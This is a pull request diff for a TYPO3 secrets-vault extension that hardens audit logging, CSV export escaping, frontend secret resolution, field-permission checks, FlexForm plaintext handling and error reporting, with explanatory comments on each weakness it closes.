### PR TITLE
Fix nine findings from a security scan of the vault extension

### DIFF
--- a/Classes/Audit/AuditLogService.php
+++ b/Classes/Audit/AuditLogService.php
@@ -35,6 +35,15 @@ final readonly class AuditLogService implements AuditLogServiceInterface
 
     private const TABLE_NAME = 'tx_nrvault_audit_log';
 
+    /**
+     * Column widths (in characters, as `varchar(N)` counts them) of the two
+     * audit columns fed straight from attacker-controlled request headers.
+     * See `clipToColumnWidth()` and `buildEntryData()`.
+     */
+    private const MAX_USER_AGENT_LENGTH = 500;
+
+    private const MAX_REQUEST_ID_LENGTH = 100;
+
     public function __construct(
         private ConnectionPool $connectionPool,
         private AccessControlServiceInterface $accessControlService,
@@ -797,8 +806,12 @@ final readonly class AuditLogService implements AuditLogServiceInterface
             'actor_username' => $this->accessControlService->getCurrentActorUsername(),
             'actor_role' => $this->getCurrentUserRole(),
             'ip_address' => $this->getClientIp(),
-            'user_agent' => $this->getUserAgent(),
-            'request_id' => $this->getRequestId(),
+            // Both come straight from a request header the client controls, and
+            // both land in a fixed-width column. Clip HERE, on the single array
+            // that feeds both the INSERT and the entry hash, so the bytes that
+            // are stored are exactly the bytes that are hashed (F8 / CWE-20).
+            'user_agent' => $this->clipToColumnWidth($this->getUserAgent(), self::MAX_USER_AGENT_LENGTH),
+            'request_id' => $this->clipToColumnWidth($this->getRequestId(), self::MAX_REQUEST_ID_LENGTH),
             'previous_hash' => $previousHash,
             'hash_before' => $inputs->hashBefore ?? '',
             'hash_after' => $inputs->hashAfter ?? '',
@@ -806,6 +819,46 @@ final readonly class AuditLogService implements AuditLogServiceInterface
             'hmac_key_epoch' => $this->getCurrentEpoch(),
             'context' => $inputs->context instanceof AuditContextInterface ? json_encode($inputs->context->toArray()) : '{}',
         ];
+    }
+
+    /**
+     * Fit a request-header-derived value into its fixed-width audit column.
+     *
+     * `user_agent` (`varchar(500)`) and `request_id` (`varchar(100)`) are the
+     * only audit columns written verbatim from a header an unauthenticated
+     * client controls, so they are the only ones that can be overflowed at
+     * will. Left unbounded, an oversized header either aborts the INSERT under
+     * strict `sql_mode` (taking the audited operation down with it) or is
+     * silently truncated by the database — and a database-side truncation
+     * desynchronises the row from the `entry_hash`, which is computed over the
+     * untruncated in-memory value, raising a permanent false tamper alarm.
+     * Clipping here, upstream of both writes, keeps stored and hashed bytes
+     * identical.
+     *
+     * Two normalisations, in order:
+     *   1. Scrub invalid UTF-8. Header bytes are arbitrary; a `utf8mb4` column
+     *      rejects an ill-formed sequence outright, so this must happen before
+     *      the value is hashed, not just before it is stored.
+     *   2. Cut to `$maxLength` *characters* on a character boundary. That is
+     *      what `varchar(N)` counts, and cutting on a boundary avoids leaving
+     *      a mangled half-character (which would itself be invalid UTF-8).
+     */
+    private function clipToColumnWidth(string $value, int $maxLength): string
+    {
+        if ($value === '') {
+            return '';
+        }
+
+        if (!mb_check_encoding($value, 'UTF-8')) {
+            $scrubbed = mb_convert_encoding($value, 'UTF-8', 'UTF-8');
+            $value = \is_string($scrubbed) ? $scrubbed : '';
+        }
+
+        if (mb_strlen($value, 'UTF-8') <= $maxLength) {
+            return $value;
+        }
+
+        return mb_substr($value, 0, $maxLength, 'UTF-8');
     }
 
     /**
@@ -1045,12 +1098,10 @@ final readonly class AuditLogService implements AuditLogServiceInterface
             return PHP_SAPI === 'cli' ? 'CLI' : '';
         }
 
-        $userAgent = $request->getHeaderLine('User-Agent');
-        if (\strlen($userAgent) > 500) {
-            return substr($userAgent, 0, 500);
-        }
-
-        return $userAgent;
+        // Bounding happens in buildEntryData() via clipToColumnWidth(), on the
+        // same array that is hashed — a byte-wise substr() here could cut a
+        // multi-byte character in half.
+        return $request->getHeaderLine('User-Agent');
     }
 
     private function getRequestId(): string

--- a/Classes/Command/VaultAuditCommand.php
+++ b/Classes/Command/VaultAuditCommand.php
@@ -326,7 +326,11 @@ final class VaultAuditCommand extends Command
 
         $output = fopen('php://temp', 'r+');
         \assert(\is_resource($output));
-        fputcsv($output, array_keys($data[0]), escape: '\\');
+        // escape: '' disables PHP's proprietary backslash escaping so that only
+        // RFC-4180 quote doubling is emitted; with the default '\\' a value
+        // containing \" closes the quoted cell and turns the remaining bytes
+        // into further cells that CsvFormulaSanitizer never inspected.
+        fputcsv($output, array_keys($data[0]), escape: '');
 
         foreach ($data as $row) {
             // Convert context array to JSON string for CSV
@@ -339,7 +343,7 @@ final class VaultAuditCommand extends Command
                 static fn (mixed $v): bool|float|int|string|null => \is_scalar($v) || $v === null ? $v : json_encode($v),
                 $row,
             );
-            fputcsv($output, CsvFormulaSanitizer::neutralizeRow($csvRow), escape: '\\');
+            fputcsv($output, CsvFormulaSanitizer::neutralizeRow($csvRow), escape: '');
         }
 
         rewind($output);

--- a/Classes/Controller/AuditController.php
+++ b/Classes/Controller/AuditController.php
@@ -344,7 +344,13 @@ final readonly class AuditController
             fwrite($output, "No data\n");
         } else {
             $first = $entries[0]->jsonSerialize();
-            fputcsv($output, array_keys($first), escape: '\\');
+            // escape: '' selects strict RFC-4180 output: enclosures are always
+            // doubled. PHP's legacy escape character ('\\') suppresses that
+            // doubling after a backslash, which lets attacker-controlled audit
+            // data (request id, user agent, reason) terminate its own quoted
+            // cell and synthesize new cells whose first byte
+            // CsvFormulaSanitizer never inspected (CWE-1236).
+            fputcsv($output, array_keys($first), escape: '');
 
             foreach ($entries as $entry) {
                 $row = $entry->jsonSerialize();
@@ -353,7 +359,7 @@ final readonly class AuditController
                 }
                 /** @var array<int, bool|float|int|string|null> $values */
                 $values = array_values($row);
-                fputcsv($output, CsvFormulaSanitizer::neutralizeRow($values), escape: '\\');
+                fputcsv($output, CsvFormulaSanitizer::neutralizeRow($values), escape: '');
             }
         }
 

--- a/Classes/EventListener/TypoScriptVaultListener.php
+++ b/Classes/EventListener/TypoScriptVaultListener.php
@@ -26,8 +26,13 @@ use TYPO3\CMS\Frontend\ContentObject\Event\AfterStdWrapFunctionsExecutedEvent;
  *   page.10.value = %vault(api_key)%
  *
  * Security considerations:
- * - Only secrets marked as `frontend_accessible = 1` can be resolved
- * - Resolved values may be cached - use USER_INT or disable caching for sensitive content
+ * - Only secrets marked as `frontend_accessible = 1` can be resolved. Resolution goes
+ *   through VaultServiceInterface::retrieveForFrontend(), which enforces that flag for
+ *   every caller — a request carrying a backend session resolves no more than an
+ *   anonymous one, so a privileged render cannot put a withheld secret into the page
+ *   cache that is shared with anonymous visitors
+ * - Resolved values are frontend-readable by definition and may be cached - use USER_INT
+ *   or disable caching for content that must not be stored
  * - Unresolved placeholders remain visible in output
  */
 #[AsEventListener(identifier: 'nr-vault/typoscript-vault')]
@@ -68,8 +73,9 @@ final readonly class TypoScriptVaultListener
     /**
      * Resolve a single vault identifier to its secret value.
      *
-     * Returns null if resolution fails (secret not found, access denied, etc.),
-     * which causes the original placeholder to be preserved.
+     * Returns null if resolution fails (secret not found, not frontend
+     * accessible, access denied, etc.), which causes the original placeholder
+     * to be preserved.
      */
     private function resolveIdentifier(string $identifier): ?string
     {
@@ -79,7 +85,7 @@ final readonly class TypoScriptVaultListener
         }
 
         try {
-            return $this->vaultService->retrieve($identifier);
+            return $this->vaultService->retrieveForFrontend($identifier);
         } catch (Throwable $e) {
             $this->logger->warning('Failed to resolve vault reference in TypoScript', [
                 'identifier' => $identifier,

--- a/Classes/Hook/DataHandlerHook.php
+++ b/Classes/Hook/DataHandlerHook.php
@@ -48,6 +48,7 @@ final class DataHandlerHook
         private readonly VaultFieldResolver $vaultFieldResolver,
         private readonly PendingSecretExtractor $pendingSecretExtractor,
         private readonly PendingSecretPersister $pendingSecretPersister,
+        private readonly VaultFailureReporter $failureReporter,
     ) {}
 
     /**
@@ -118,6 +119,12 @@ final class DataHandlerHook
                 $rollbackValue = $pending->identifier;
             }
 
+            // Filled by the failure-message factory below when persist() catches.
+            // Captured here so the flash message and the DataHandler log detail —
+            // which core replays to the same user — carry the SAME correlation
+            // reference for one failure, and neither carries the cause.
+            $userMessage = '';
+
             $error = $this->pendingSecretPersister->persist(
                 $pending,
                 [
@@ -128,13 +135,23 @@ final class DataHandlerHook
                 ],
                 'TCA field cleared',
                 'TCA field updated',
-                static fn (Throwable $e): string => \sprintf(
-                    'Vault storage failed for field "%s" on %s:%d: %s. The field value has been rolled back.',
-                    $fieldName,
-                    $table,
-                    $uid,
-                    $e->getMessage(),
-                ),
+                function (Throwable $e) use ($table, $fieldName, $uid, $pending, &$userMessage): string {
+                    $userMessage = $this->failureReporter->report($e, [
+                        'table' => $table,
+                        'field' => $fieldName,
+                        'uid' => $uid,
+                        'identifier' => $pending->identifier,
+                        'operation' => 'tca_field',
+                    ]);
+
+                    return \sprintf(
+                        'Vault storage failed for field "%s" on %s:%d: %s The field value has been rolled back.',
+                        $fieldName,
+                        $table,
+                        $uid,
+                        $userMessage,
+                    );
+                },
                 function () use ($table, $uid, $fieldName, $rollbackValue): void {
                     $this->rollBackField($table, $uid, $fieldName, $rollbackValue);
                 },
@@ -148,7 +165,7 @@ final class DataHandlerHook
                     $status === 'new' ? 1 : 2,
                     null,
                     1,
-                    'Vault error for field "' . $fieldName . '": ' . $error->getMessage(),
+                    'Vault error for field "' . $fieldName . '": ' . $userMessage,
                 );
             }
         }
@@ -211,6 +228,14 @@ final class DataHandlerHook
             try {
                 $this->vaultService->delete($vaultIdentifier, 'Record deleted');
             } catch (Throwable $e) {
+                $userMessage = $this->failureReporter->report($e, [
+                    'table' => $table,
+                    'field' => $fieldName,
+                    'uid' => (int) $id,
+                    'identifier' => $vaultIdentifier,
+                    'operation' => 'delete',
+                ]);
+
                 /** @phpstan-ignore method.internal */
                 $dataHandler->log(
                     $table,
@@ -218,7 +243,7 @@ final class DataHandlerHook
                     3,
                     null,
                     1,
-                    'Vault error during delete for field "' . $fieldName . '": ' . $e->getMessage(),
+                    'Vault error during delete for field "' . $fieldName . '": ' . $userMessage,
                 );
             }
         }
@@ -308,6 +333,14 @@ final class DataHandlerHook
                 // Track update for the copied record
                 $updates[$fieldName] = $newIdentifier;
             } catch (Throwable $e) {
+                $userMessage = $this->failureReporter->report($e, [
+                    'table' => $table,
+                    'field' => $fieldName,
+                    'uid' => $newId,
+                    'identifier' => $sourceIdentifier,
+                    'operation' => 'copy',
+                ]);
+
                 /** @phpstan-ignore method.internal */
                 $dataHandler->log(
                     $table,
@@ -315,7 +348,7 @@ final class DataHandlerHook
                     1,
                     null,
                     1,
-                    'Vault error during copy for field "' . $fieldName . '": ' . $e->getMessage(),
+                    'Vault error during copy for field "' . $fieldName . '": ' . $userMessage,
                 );
             } finally {
                 // Scrub the decrypted plaintext from memory (success or failure).

--- a/Classes/Hook/DataHandlerHook.php
+++ b/Classes/Hook/DataHandlerHook.php
@@ -11,10 +11,13 @@ namespace Netresearch\NrVault\Hook;
 
 use Exception;
 use Netresearch\NrVault\Hook\Dto\PendingSecret;
+use Netresearch\NrVault\Service\VaultFieldPermission;
+use Netresearch\NrVault\Service\VaultFieldPermissionService;
 use Netresearch\NrVault\Service\VaultServiceInterface;
 use Netresearch\NrVault\Utility\IdentifierValidator;
 use Netresearch\NrVault\Utility\VaultFieldResolver;
 use Throwable;
+use TYPO3\CMS\Core\Authentication\BackendUserAuthentication;
 use TYPO3\CMS\Core\Database\ConnectionPool;
 use TYPO3\CMS\Core\DataHandling\DataHandler;
 
@@ -49,6 +52,7 @@ final class DataHandlerHook
         private readonly PendingSecretExtractor $pendingSecretExtractor,
         private readonly PendingSecretPersister $pendingSecretPersister,
         private readonly VaultFailureReporter $failureReporter,
+        private readonly VaultFieldPermissionService $fieldPermissionService,
     ) {}
 
     /**
@@ -56,11 +60,15 @@ final class DataHandlerHook
      * Extracts vault field values and generates UUIDs for new secrets.
      *
      * @param array<string, mixed> $fieldArray
+     * @param DataHandler|null $dataHandler Passed by DataHandler::process_datamap();
+     *                                      optional so the hook stays callable with
+     *                                      the three documented arguments
      */
     public function processDatamap_preProcessFieldArray(// NOSONAR: TYPO3 DataHandler hook method name (fixed API contract)
         array &$fieldArray,
         string $table,
         string|int $id,
+        ?DataHandler $dataHandler = null,
     ): void {
         $vaultFieldNames = $this->getVaultFieldNames($table);
 
@@ -75,6 +83,14 @@ final class DataHandlerHook
             // Skip if empty and no existing value
             if (!$pending instanceof PendingSecret) {
                 unset($fieldArray[$fieldName]);
+                continue;
+            }
+
+            // A value change was submitted for this field - re-check the TSconfig
+            // permission the FormEngine element only enforced in the markup.
+            if (!$this->isFieldWritable($table, $fieldName)) {
+                unset($fieldArray[$fieldName]);
+                $this->logDeniedWrite($table, $id, $fieldName, $dataHandler);
                 continue;
             }
 
@@ -362,6 +378,62 @@ final class DataHandlerHook
         if ($updates !== []) {
             $connection->update($table, $updates, ['uid' => $newId]);
         }
+    }
+
+    /**
+     * Decide whether the current backend user may write this vault field.
+     *
+     * Mirrors the FormEngine decision in
+     * {@see \Netresearch\NrVault\Form\Element\VaultSecretElement}: that element
+     * renders the input `readonly` when TSconfig denies `edit` OR sets
+     * `readOnly`, so both settings mean "not writable" here as well. Both paths
+     * ask the same {@see VaultFieldPermissionService}, which resolves
+     * `vault.permissions` from the page-0 TSconfig regardless of the record's
+     * page - so renderer and write path always see the same configuration.
+     *
+     * Without a backend user there is no TSconfig subject at all (CLI imports,
+     * scheduler tasks): those callers keep their previous behaviour, the vault's
+     * own ACL still governs the resulting store/rotate/delete.
+     */
+    private function isFieldWritable(string $table, string $fieldName): bool
+    {
+        $backendUser = $GLOBALS['BE_USER'] ?? null;
+        if (!$backendUser instanceof BackendUserAuthentication) {
+            return true;
+        }
+
+        return $this->fieldPermissionService->isAllowed($table, $fieldName, VaultFieldPermission::Edit)
+            && !$this->fieldPermissionService->isReadOnly($table, $fieldName);
+    }
+
+    /**
+     * Record a discarded vault field value in the DataHandler log.
+     *
+     * The entry is written with an error severity, so the backend surfaces it
+     * as a flash message via `DataHandler::printLogErrorMessages()` - the editor
+     * must not silently lose the value they typed.
+     */
+    private function logDeniedWrite(
+        string $table,
+        string|int $id,
+        string $fieldName,
+        ?DataHandler $dataHandler,
+    ): void {
+        if (!$dataHandler instanceof DataHandler) {
+            return;
+        }
+
+        $uid = is_numeric($id) ? (int) $id : 0;
+
+        /** @phpstan-ignore method.internal */
+        $dataHandler->log(
+            $table,
+            $uid,
+            $uid === 0 ? 1 : 2,
+            null,
+            1,
+            'Vault field "' . $fieldName . '" is not editable for this user (TSconfig vault.permissions): the submitted value was discarded and the stored secret left unchanged.',
+        );
     }
 
     /**

--- a/Classes/Hook/FlexFormVaultHook.php
+++ b/Classes/Hook/FlexFormVaultHook.php
@@ -17,8 +17,10 @@ use Throwable;
 use TYPO3\CMS\Core\Configuration\FlexForm\FlexFormTools;
 use TYPO3\CMS\Core\Database\ConnectionPool;
 use TYPO3\CMS\Core\DataHandling\DataHandler;
+use TYPO3\CMS\Core\Information\Typo3Version;
 use TYPO3\CMS\Core\Messaging\FlashMessage;
 use TYPO3\CMS\Core\Messaging\FlashMessageService;
+use TYPO3\CMS\Core\Schema\TcaSchema;
 use TYPO3\CMS\Core\Schema\TcaSchemaFactory;
 use TYPO3\CMS\Core\Type\ContextualFeedbackSeverity;
 
@@ -60,6 +62,9 @@ final class FlexFormVaultHook
 
         $schema = $this->tcaSchemaFactory->get($table);
 
+        /** @var array<string, mixed>|null $recordRow */
+        $recordRow = null;
+
         foreach ($schema->getFields() as $field) {
             $fieldConfig = $field->getConfiguration();
 
@@ -84,6 +89,9 @@ final class FlexFormVaultHook
 
             /** @var array<string, mixed> $flexData */
             $flexData = $fieldArray[$fieldName];
+            // Resolved lazily: the record row is only needed once a FlexForm
+            // field is actually part of the current save.
+            $recordRow ??= $this->resolveRecordRow($table, $id, $fieldArray);
             // Process the FlexForm data array
             $this->processFlexFormData(
                 $flexData,
@@ -91,6 +99,8 @@ final class FlexFormVaultHook
                 $id,
                 $fieldName,
                 ['config' => $fieldConfig],
+                $schema,
+                $recordRow,
             );
             $fieldArray[$fieldName] = $flexData;
         }
@@ -280,6 +290,7 @@ final class FlexFormVaultHook
      *
      * @param array<string, mixed> $data
      * @param array<string, mixed> $flexFieldConfig
+     * @param array<string, mixed> $recordRow
      */
     private function processFlexFormData(
         array &$data,
@@ -287,9 +298,19 @@ final class FlexFormVaultHook
         string|int $id,
         string $flexFieldName,
         array $flexFieldConfig,
+        TcaSchema $schema,
+        array $recordRow,
     ): void {
-        $dataStructure = $this->getFlexFormDataStructure($flexFieldConfig, $data);
+        $dataStructure = $this->getFlexFormDataStructure(
+            $flexFieldConfig,
+            $table,
+            $flexFieldName,
+            $recordRow,
+            $schema,
+        );
         if ($dataStructure === null) {
+            $this->discardUnprocessedVaultPlaintext($data, $table, $id, $flexFieldName);
+
             return;
         }
 
@@ -346,6 +367,9 @@ final class FlexFormVaultHook
                 );
             }
         }
+        unset($sheetData, $fieldData);
+
+        $this->discardUnprocessedVaultPlaintext($data, $table, $id, $flexFieldName);
     }
 
     /**
@@ -572,26 +596,188 @@ final class FlexFormVaultHook
     /**
      * Get the FlexForm data structure.
      *
+     * The table and field name identify the TCA column the data structure is
+     * defined on, and the record row supplies the record type (CType /
+     * list_type) that selects the concrete data structure. Passing empty
+     * strings and the submitted FlexForm array instead makes the lookup fail on
+     * every supported TYPO3 version, which used to silently disable the vault
+     * handling below.
+     *
      * @param array<string, mixed> $fieldConfig
-     * @param array<string, mixed> $data
+     * @param array<string, mixed> $recordRow
      *
      * @return array<string, mixed>|null
      */
-    private function getFlexFormDataStructure(array $fieldConfig, array $data): ?array
-    {
+    private function getFlexFormDataStructure(
+        array $fieldConfig,
+        string $table,
+        string $fieldName,
+        array $recordRow,
+        TcaSchema $schema,
+    ): ?array {
+        $schemaArguments = $this->dataStructureSchemaArguments($schema);
+
         try {
             $dataStructureIdentifier = $this->flexFormTools->getDataStructureIdentifier(
                 $fieldConfig,
-                '',
-                '',
-                $data,
+                $table,
+                $fieldName,
+                $recordRow,
+                ...$schemaArguments,
             );
 
             /** @phpstan-ignore return.type */
-            return $this->flexFormTools->parseDataStructureByIdentifier($dataStructureIdentifier);
+            return $this->flexFormTools->parseDataStructureByIdentifier(
+                $dataStructureIdentifier,
+                ...$schemaArguments,
+            );
         } catch (Exception) {
             return null;
         }
+    }
+
+    /**
+     * Build the trailing schema argument for the FlexFormTools API.
+     *
+     * TYPO3 v14 requires a TcaSchema to resolve a data structure and throws
+     * without it; the v13.4 signatures do not accept the argument at all. PHP
+     * ignores surplus positional arguments, so it is only appended when the
+     * running core knows about it.
+     *
+     * @return list<TcaSchema>
+     */
+    private function dataStructureSchemaArguments(TcaSchema $schema): array
+    {
+        return (new Typo3Version())->getMajorVersion() >= 14 ? [$schema] : [];
+    }
+
+    /**
+     * Resolve the record row the FlexForm data structure lookup needs.
+     *
+     * The data structure of a FlexForm field is selected by the record type,
+     * which is not necessarily part of the submitted field array on an update,
+     * so the persisted row is loaded and the submitted values are layered on
+     * top of it.
+     *
+     * @param array<string, mixed> $fieldArray
+     *
+     * @return array<string, mixed>
+     */
+    private function resolveRecordRow(string $table, string|int $id, array $fieldArray): array
+    {
+        $persistedRow = [];
+
+        if (is_numeric($id) && (int) $id > 0) {
+            try {
+                $row = $this->connectionPool
+                    ->getConnectionForTable($table)
+                    ->select(['*'], $table, ['uid' => (int) $id])
+                    ->fetchAssociative();
+
+                if (\is_array($row)) {
+                    $persistedRow = $row;
+                }
+            } catch (Throwable) {
+                // Without the persisted row the data structure lookup may fail;
+                // the fail-closed handling then discards the plaintext.
+            }
+        }
+
+        return array_merge($persistedRow, $fieldArray);
+    }
+
+    /**
+     * Discard vault plaintext the data-structure driven pass did not convert
+     * into a vault identifier.
+     *
+     * Without this, DataHandler serialises the submitted value verbatim into the
+     * stored FlexForm XML — the secret would end up unencrypted in the record,
+     * with no vault entry, no access control and no audit trail.
+     *
+     * @param array<string, mixed> $data
+     */
+    private function discardUnprocessedVaultPlaintext(
+        array &$data,
+        string $table,
+        string|int $id,
+        string $flexFieldName,
+    ): void {
+        if (!$this->stripVaultPlaintext($data)) {
+            return;
+        }
+
+        $this->addFlashMessage(
+            \sprintf(
+                'A vault secret submitted for FlexForm field "%s" on %s:%s was discarded because the'
+                . ' field could not be resolved to a vault secret element. Storing it would have'
+                . ' written the value unencrypted into the record.',
+                $flexFieldName,
+                $table,
+                (string) $id,
+            ),
+            'Vault Error',
+            ContextualFeedbackSeverity::ERROR,
+        );
+    }
+
+    /**
+     * Replace every submitted vault value that still carries plaintext with its
+     * vault identifier, recursively. Values without plaintext are left as they
+     * are.
+     *
+     * @template TKey of array-key
+     *
+     * @param array<TKey, mixed> $node
+     *
+     * @param-out array<TKey, mixed> $node
+     *
+     * @return bool True if at least one plaintext value was removed
+     */
+    private function stripVaultPlaintext(array &$node): bool
+    {
+        $stripped = false;
+
+        foreach ($node as &$value) {
+            if (!\is_array($value)) {
+                continue;
+            }
+
+            if ($this->carriesVaultPlaintext($value)) {
+                /** @var mixed $rawIdentifier */
+                $rawIdentifier = $value['_vault_identifier'] ?? '';
+                $value = \is_string($rawIdentifier) && IdentifierValidator::looksLikeVaultIdentifier($rawIdentifier)
+                    ? $rawIdentifier
+                    : '';
+                $stripped = true;
+
+                continue;
+            }
+
+            if ($this->stripVaultPlaintext($value)) {
+                $stripped = true;
+            }
+        }
+        unset($value);
+
+        return $stripped;
+    }
+
+    /**
+     * Check whether a submitted value is a vault secret element submission that
+     * still contains the plaintext.
+     *
+     * @param array<mixed, mixed> $value
+     */
+    private function carriesVaultPlaintext(array $value): bool
+    {
+        if (!\array_key_exists('_vault_identifier', $value) && !\array_key_exists('_vault_checksum', $value)) {
+            return false;
+        }
+
+        /** @var mixed $rawSecretValue */
+        $rawSecretValue = $value['value'] ?? $value[0] ?? '';
+
+        return (\is_string($rawSecretValue) || \is_int($rawSecretValue)) && (string) $rawSecretValue !== '';
     }
 
     /**

--- a/Classes/Hook/FlexFormVaultHook.php
+++ b/Classes/Hook/FlexFormVaultHook.php
@@ -43,6 +43,7 @@ final class FlexFormVaultHook
         private readonly VaultServiceInterface $vaultService,
         private readonly FlexFormTools $flexFormTools,
         private readonly FlashMessageService $flashMessageService,
+        private readonly VaultFailureReporter $failureReporter,
     ) {}
 
     /**
@@ -175,6 +176,14 @@ final class FlexFormVaultHook
                 try {
                     $this->vaultService->delete($identifier, 'Record deleted');
                 } catch (Throwable $e) {
+                    $userMessage = $this->failureReporter->report($e, [
+                        'table' => $table,
+                        'flexField' => $flexFieldName,
+                        'uid' => $id,
+                        'identifier' => $identifier,
+                        'operation' => 'flexform_delete',
+                    ]);
+
                     /** @phpstan-ignore method.internal */
                     $dataHandler->log(
                         $table,
@@ -182,7 +191,7 @@ final class FlexFormVaultHook
                         3,
                         null,
                         1,
-                        'Vault error during delete for FlexForm field: ' . $e->getMessage(),
+                        'Vault error during delete for FlexForm field: ' . $userMessage,
                     );
                 }
             }
@@ -266,6 +275,14 @@ final class FlexFormVaultHook
 
                     $xml = str_replace($oldIdentifier, $newIdentifier, $xml);
                 } catch (Throwable $e) {
+                    $userMessage = $this->failureReporter->report($e, [
+                        'table' => $table,
+                        'flexField' => $flexFieldName,
+                        'uid' => $newId,
+                        'identifier' => $oldIdentifier,
+                        'operation' => 'flexform_copy',
+                    ]);
+
                     /** @phpstan-ignore method.internal */
                     $dataHandler->log(
                         $table,
@@ -273,7 +290,7 @@ final class FlexFormVaultHook
                         1,
                         null,
                         1,
-                        'Vault error during copy for FlexForm field "' . $flexFieldName . '": ' . $e->getMessage(),
+                        'Vault error during copy for FlexForm field "' . $flexFieldName . '": ' . $userMessage,
                     );
                 }
             }
@@ -551,6 +568,18 @@ final class FlexFormVaultHook
                 $this->vaultService->rotate($pending->identifier, $pending->value, 'FlexForm field updated');
             }
         } catch (Throwable $e) {
+            // One report for both channels: the flash message AND the
+            // DataHandler log detail are replayed to the editor, so both must
+            // carry the same correlation reference and neither the cause.
+            $userMessage = $this->failureReporter->report($e, [
+                'table' => $table,
+                'flexField' => $pending->flexField,
+                'fieldPath' => $pending->fieldPath,
+                'uid' => $uid,
+                'identifier' => $pending->identifier,
+                'operation' => 'flexform_field',
+            ]);
+
             /** @phpstan-ignore method.internal */
             $dataHandler->log(
                 $table,
@@ -558,7 +587,7 @@ final class FlexFormVaultHook
                 2,
                 null,
                 1,
-                'Vault error for FlexForm field "' . $pending->fieldPath . '": ' . $e->getMessage(),
+                'Vault error for FlexForm field "' . $pending->fieldPath . '": ' . $userMessage,
             );
 
             $this->addFlashMessage(
@@ -567,7 +596,7 @@ final class FlexFormVaultHook
                     $pending->fieldPath,
                     $table,
                     $uid,
-                    $e->getMessage(),
+                    $userMessage,
                 ),
                 'Vault Error',
                 ContextualFeedbackSeverity::ERROR,

--- a/Classes/Hook/VaultFailureReporter.php
+++ b/Classes/Hook/VaultFailureReporter.php
@@ -1,0 +1,130 @@
+<?php
+
+/*
+ * Copyright (c) 2025-2026 Netresearch DTT GmbH
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
+
+declare(strict_types=1);
+
+namespace Netresearch\NrVault\Hook;
+
+use Netresearch\NrVault\Utility\LocalisationHelper;
+use Psr\Log\LoggerInterface;
+use Throwable;
+use TYPO3\CMS\Core\Localization\LanguageService;
+
+/**
+ * Reports a failed vault operation to the backend user without telling them why
+ * it failed.
+ *
+ * The DataHandler hooks used to interpolate the raw vault exception message into
+ * the flash message *and* into the `DataHandler::log()` detail — core replays
+ * both to the editor who triggered the save. `SecretNotFoundException` and
+ * `AccessDeniedException` are textually distinct, so an editor who controls the
+ * submitted `_vault_identifier` could tell "does not exist" from "exists, but you
+ * may not touch it" and enumerate secrets outside their ACL (CWE-209).
+ *
+ * {@see report()} therefore returns one cause-independent sentence carrying a
+ * random correlation reference, and writes the cause to the server-side log under
+ * that same reference so an administrator can still diagnose the failure.
+ *
+ * Everything variable goes into the PSR-3 *context* array, never into the message
+ * argument: TYPO3's `FileWriter` writes the message verbatim
+ * (`fwrite($handle, $message . LF)`) while `json_encode()`-ing the context, so
+ * attacker bytes in the message would let a crafted identifier forge whole log
+ * records — including a forged record quoting the reference the user was told to
+ * report. Context values are additionally stripped of control bytes and
+ * length-capped, because not every configured writer encodes context the same way
+ * and because an unbounded value would let repeated failed saves inflate the log.
+ */
+final readonly class VaultFailureReporter
+{
+    /**
+     * Constant, placeholder-free log message.
+     *
+     * It must stay free of variable data (see the class docblock) and free of
+     * `{placeholder}` tokens, which TYPO3's writers interpolate from the context
+     * back into the raw message.
+     */
+    private const LOG_MESSAGE = 'Vault operation failed';
+
+    private const LABEL_KEY = 'LLL:EXT:nr_vault/Resources/Private/Language/locallang.xlf:hook.vaultFailure.reference';
+
+    private const FALLBACK_MESSAGE = 'The vault operation could not be completed. Please ask an administrator to check the vault log for reference %s.';
+
+    /** Byte cap applied to every string written into the log context. */
+    private const MAX_LOGGED_VALUE_LENGTH = 200;
+
+    public function __construct(
+        private LoggerInterface $logger,
+    ) {}
+
+    /**
+     * Log the cause server-side, return the cause-independent message for the user.
+     *
+     * @param array<string, string|int|null> $context Where the failure happened (table, field,
+     *                                                uid, identifier, operation). Never pass a
+     *                                                secret value — record coordinates only.
+     *
+     * @return string The message to show the backend user; carries only the correlation reference
+     */
+    public function report(Throwable $error, array $context = []): string
+    {
+        $reference = bin2hex(random_bytes(8));
+
+        $logContext = ['reference' => $reference];
+
+        foreach ($context as $key => $value) {
+            $logContext[$key] = \is_string($value) ? self::sanitiseForLog($value) : $value;
+        }
+
+        // Deliberately NOT the 'exception' key: TYPO3's FileWriter folds a
+        // Throwable stored there into the unescaped message. Class name and
+        // sanitised text only.
+        $logContext['exceptionClass'] = $error::class;
+        $logContext['error'] = self::sanitiseForLog($error->getMessage());
+
+        $this->logger->error(self::LOG_MESSAGE, $logContext);
+
+        return str_replace('%s', $reference, $this->getMessageTemplate());
+    }
+
+    /**
+     * Strip control bytes (so no value can start a forged log line) and cap the
+     * length (so repeated failures cannot inflate the log), then force valid
+     * UTF-8 so the record survives `json_encode()`.
+     */
+    private static function sanitiseForLog(string $value): string
+    {
+        // Byte-wise class, deliberately without the /u modifier: it matches C0
+        // plus DEL, leaves UTF-8 continuation bytes alone, and cannot fail (and
+        // return null) on malformed input the way a /u pattern does.
+        $clean = preg_replace('/[[:cntrl:]]/', '', $value) ?? '';
+
+        if (\strlen($clean) > self::MAX_LOGGED_VALUE_LENGTH) {
+            $clean = substr($clean, 0, self::MAX_LOGGED_VALUE_LENGTH);
+        }
+
+        // Truncation can split a multi-byte sequence, and the raw value may not
+        // have been UTF-8 in the first place; either would make json_encode()
+        // fail and drop the whole context array. Substitute the invalid bytes.
+        return mb_convert_encoding($clean, 'UTF-8', 'UTF-8');
+    }
+
+    private function getMessageTemplate(): string
+    {
+        /** @var mixed $languageService */
+        $languageService = $GLOBALS['LANG'] ?? null;
+
+        if (!$languageService instanceof LanguageService) {
+            return self::FALLBACK_MESSAGE;
+        }
+
+        return LocalisationHelper::translateOrFallback(
+            $languageService,
+            self::LABEL_KEY,
+            self::FALLBACK_MESSAGE,
+        );
+    }
+}

--- a/Classes/Hook/VaultFailureReporter.php
+++ b/Classes/Hook/VaultFailureReporter.php
@@ -76,14 +76,14 @@ final readonly class VaultFailureReporter
         $logContext = ['reference' => $reference];
 
         foreach ($context as $key => $value) {
-            $logContext[$key] = \is_string($value) ? self::sanitiseForLog($value) : $value;
+            $logContext[$key] = \is_string($value) ? $this->sanitiseForLog($value) : $value;
         }
 
         // Deliberately NOT the 'exception' key: TYPO3's FileWriter folds a
         // Throwable stored there into the unescaped message. Class name and
         // sanitised text only.
         $logContext['exceptionClass'] = $error::class;
-        $logContext['error'] = self::sanitiseForLog($error->getMessage());
+        $logContext['error'] = $this->sanitiseForLog($error->getMessage());
 
